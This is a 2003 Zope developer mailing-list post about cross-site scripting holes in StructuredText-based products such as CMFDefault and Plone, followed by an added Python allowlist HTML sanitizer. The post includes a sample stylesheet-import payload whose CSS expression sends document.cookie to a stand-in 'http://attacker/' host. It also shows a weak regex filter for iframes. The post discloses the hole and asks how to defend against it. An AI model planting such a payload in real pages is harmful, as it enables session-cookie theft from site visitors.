On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman <[EMAIL PROTECTED]> wrote:
> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

Related issues:

CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits anonymous users or persons without good references to write.

To cope with the matter, I stupidly put multiple string substitution:

    import re   # added for completeness; t is assumed to hold the page text being filtered
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)

It would be appreciated if someone advises me of a more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementation may be left to each developer. If it had the ability to avoid them, it would be much better, I think.

Another example

The following sample may allow malicious.css to be imported from outside of the site. Put #1 or #2 into a StructuredText page.

    #1
    <LINK rel="stylesheet" href="http://attacker/malicious.css">

    #2
    <STYLE type="text/css">
    @import url('http://attacker/malicious.css');
    </STYLE>

    # example of malicious.css (http://attacker/malicious.css)
    body {
      left: expression(eval(
        'document.location="http://attacker/"+document.cookie;'))
    }

For example, make a 'Document' in a CMFDefault site, and put #1 into the reply form (DiscussionItem) against the original document, etc. It seems CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

-- 
Kazuya Fukamachi

_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
http://mail.zope.org/mailman/listinfo/zope-dev
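An added example, not from the post above and not Zope or CMF code: an allowlist sanitizer built on Python's html.parser, placed beside the repeated iframe substitution from the post. The blacklist leaves the <LINK> and <STYLE> cases untouched, while the allowlist rebuilds the markup from a short list of permitted tags, so link, iframe and style are dropped whatever their case or nesting. The tag and attribute policy is an assumption chosen for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Policy for this example (an assumption, not Zope's or CMF's): tags a discussion
# page may legitimately use, and the single attribute allowed on one of them.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "pre", "code", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/")

def blacklist_sub(t):
    """The repeated substitution from the post: it only knows about iframe."""
    for _ in range(3):
        t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
    return t

class AllowlistSanitizer(HTMLParser):
    """Rebuilds the markup from allowed tags only; anything else is dropped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.in_raw = 0  # >0 while inside <style>/<script>, whose text is discarded

    def handle_starttag(self, tag, attrs):
        if tag in ("style", "script"):
            self.in_raw += 1
        elif tag in ALLOWED_TAGS and not self.in_raw:
            kept = ""
            for name, value in attrs:  # attributes off the list (rel, style, ...) vanish
                if name in ALLOWED_ATTRS.get(tag, ()) and value \
                        and value.lower().startswith(SAFE_HREF_PREFIXES):
                    kept += f' {name}="{escape(value)}"'
            self.out.append(f"<{tag}{kept}>")
        # <link>, <iframe> and every other unlisted tag fall through and are dropped

    def handle_endtag(self, tag):
        if tag in ("style", "script"):
            self.in_raw = max(0, self.in_raw - 1)
        elif tag in ALLOWED_TAGS and not self.in_raw:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_raw:
            self.out.append(escape(data))  # text is re-escaped, never passed through raw

def sanitize(t):
    p = AllowlistSanitizer()
    p.feed(t)
    p.close()
    return "".join(p.out)
```

The same allowlist approach also covers the attribute side of the problem: rel, style and event-handler attributes never reach the output because only the listed attribute on the listed tag is copied.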